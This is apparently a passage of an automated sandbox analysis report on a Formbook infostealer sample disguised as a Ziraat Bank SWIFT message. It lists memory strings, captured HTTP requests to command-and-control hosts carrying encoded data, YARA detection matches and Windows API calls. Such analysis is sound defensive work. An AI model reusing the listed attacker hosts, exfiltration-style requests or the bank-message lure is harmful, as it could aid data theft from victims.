Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302865321.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302414369.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302326537.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303167686.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302564228.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303077151.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302653539.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302751937.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302492163.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 
00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303316822.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303418082.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.303007184.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/P
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301083951.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300913114.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/S
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302865321.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302414369.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302326537.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302564228.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302653539.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302751937.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302492163.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 
00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302803561.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302242022.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302950130.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0P
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301083951.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/l
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300913114.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/l
Source: unknown HTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.multimediapages.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.multimediapages.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.multimediapages.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 52 68 34 6c 72 3d 6d 63 4c 7a 7a 6c 6c 51 57 77 75 6a 4d 66 4c 6f 52 70 77 35 65 38 31 69 78 38 6d 58 62 51 5a 4c 73 6e 4b 42 38 44 67 6b 55 49 61 68 7a 49 4e 62 6e 6d 30 59 79 36 4e 37 54 33 76 33 72 6d 6a 76 4f 51 46 68 31 6d 33 6f 76 73 4f 62 52 57 69 70 78 6d 37 42 4a 65 6d 4c 79 44 61 4f 34 47 6a 5a 70 43 75 66 75 35 76 6e 6c 6f 37 78 30 70 79 2d 46 48 63 41 49 30 37 47 71 70 72 4a 54 36 4c 38 55 5f 45 6e 51 5f 28 48 66 38 64 59 50 71 62 30 78 31 7e 62 55 79 6f 4b 33 4e 37 6e 65 30 72 50 59 77 58 4c 45 4f 6b 50 39 51 71 56 47 51 6c 44 6f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: mRh4lr=mcLzzllQWwujMfLoRpw5e81ix8mXbQZLsnKB8DgkUIahzINbnm0Yy6N7T3v3rmjvOQFh1m3ovsObRWipxm7BJemLyDaO4GjZpCufu5vnlo7x0py-FHcAI07GqprJT6L8U_EnQ_(Hf8dYPqb0x1~bUyoK3N7ne0rPYwXLEOkP9QqVGQlDow).
Source: unknown DNS traffic detected: queries for: www.notarpucarhr.com
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73ehw8miGBWwdljwfXw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.notarpucarhr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61ftArfg9GGH4Fupqg==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.multimediapages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.oaksinstitute.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.31854c4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.3169a9c.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.451409709.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221129-34221.exe PID: 1308, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 1312, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.31854c4.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.3169a9c.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.451409709.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221129-34221.exe PID: 1308, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 1312, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: String function: 0127B150 appears 72 times
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_012B9910
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B99A0 NtCreateSection,LdrInitializeThunk, 6_2_012B99A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_012B9860
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9840 NtDelayExecution,LdrInitializeThunk, 6_2_012B9840
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_012B98F0
